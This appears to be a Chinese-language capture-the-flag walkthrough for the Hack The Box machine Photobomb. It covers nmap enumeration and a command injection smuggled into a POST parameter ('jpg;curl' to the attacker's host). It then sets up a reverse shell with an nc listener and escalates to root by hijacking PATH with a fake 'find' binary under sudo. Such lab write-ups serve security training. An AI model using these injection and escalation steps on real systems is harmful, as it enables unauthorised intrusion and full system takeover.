题目网址:
https://app.hackthebox.com/machines/Photobomb
使用nmap枚举靶机
nmap -sC -sV -p- 10.10.11.182
这里发现了域名,我们本地dns解析一下
echo "10.10.11.182 photobomb.htb" >> /etc/hosts
然后就是常规的枚举网站子域名,网站目录,查找网站框架的漏洞什么的,这些我都做了,但是没什么突破点,只能去网页上看看了
点击后会让我们输入账号和密码
查看了一下网站源码,发现有一个js文件
点击跳转
这个文件是刚刚登录框的js文件,这里应该是账号和密码,然后返回登录
登录后可以下载一些图片,然后就没其他的了,我们使用burp抓一下下载的包
ctrl+r
现在就是测试参数有没有命令注入的漏洞,开启python http
python3 -m http.server 80
然后回到burp里测试参数,photo和dimensions都没有,在测试到filetype参数的时候就有突破点了
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg;curl+10.10.14.8&filetype=jpg&dimensions=3000x2000
kali收到靶机发出的访问信息,现在我们就该反弹shell了
这里推荐这个网站,可以生成很多的反弹shell
https://www.revshells.com/
我们使用这个payload,空格都替换为+
然后kali使用nc监听指定的端口
nc -nvlp 5555
然后发送payload
成功获得用户权限
查看当前用户可以用sudo执行什么东西
sudo -l
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
这只是个bash脚本,功能是获取日志文件并将其内容移动到photobomb.log.old然后使用truncate清除photobomb.log
最关键的地方就是最后一行的这个命令,他find使用的是相对路径,而不是绝对路径,也就是说,我们改变一下环境变量,然后在当前目录创建一个find文件,里面写一个shell,之后用sudo执行的时候,就能直接获得root权限
echo "/bin/bash" > find
chmod +x find
sudo PATH=$PWD:$PATH /opt/cleanup.sh //更改环境变量为当前目录
成功获得root权限